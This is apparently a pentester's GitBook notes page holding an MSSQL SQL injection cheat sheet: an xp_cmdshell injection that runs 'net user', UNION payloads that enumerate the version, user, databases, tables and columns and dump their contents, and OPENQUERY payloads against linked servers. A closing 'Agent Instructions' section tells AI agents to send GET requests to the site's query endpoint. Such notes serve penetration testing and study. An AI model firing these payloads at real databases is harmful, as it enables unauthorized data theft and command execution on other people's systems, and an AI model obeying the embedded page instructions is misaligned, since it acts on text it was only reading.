# MSSQL

### Standard

```sql
-- XP_CMDSHELL
Query: 00') EXEC xp_cmdshell 'net user'-- -
```

### UNION

```sql
-- RANDOM
--- Version
Query: 00') UNION SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

--- User
Query: 00') UNION SELECT NULL,NULL,NULL,user,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

--- Databases (n = 0,1,2,3,4 etc..)
Query: 00') UNION SELECT NULL,NULL,NULL,DB_NAME(N),NULL,NULL,NULL,NULL,NULL,NULL,NULL -- -

------------------------

-- DATABASE INFORMATION
--- LIST TABLES
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables -- -
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_catalog = 'TEST_DB'-- -
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(table_name,'|') FROM (SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_catalog = 'TEST_DB' OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY-- -

-- LIST COLUMNS
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(column_name,'|') FROM (SELECT column_name FROM information_schema.columns WHERE table_name='POC_Test' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

-- DUMP CONTENT FROM COLUMN
--- SINGEL COLUMN
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(UserName,'|') FROM (SELECT UserName FROM POC_Test ORDER BY UserName OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

--- MULTIPLE COLUMNs
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(CONCAT_WS(',',NameID,UserName),'|') FROM (SELECT NameID,UserName FROM POC_Test ORDER BY NameID OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

------------------------

-- LINKED DATABASES
--- LIST COLUMNS
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT CAST(v AS NVARCHAR(MAX)) FROM OPENQUERY(<HOSTNAME>,'SELECT column_name FROM information_schema.columns WHERE table_name=''TEST_TABLE'' AS v')),NULL
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(column_name,'|') FROM OPENQUERY(<HOSTNAME>,'SELECT column_name FROM information_schema.columns WHERE table_name=''test_table'' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -


```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/sql-injection/mssql.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.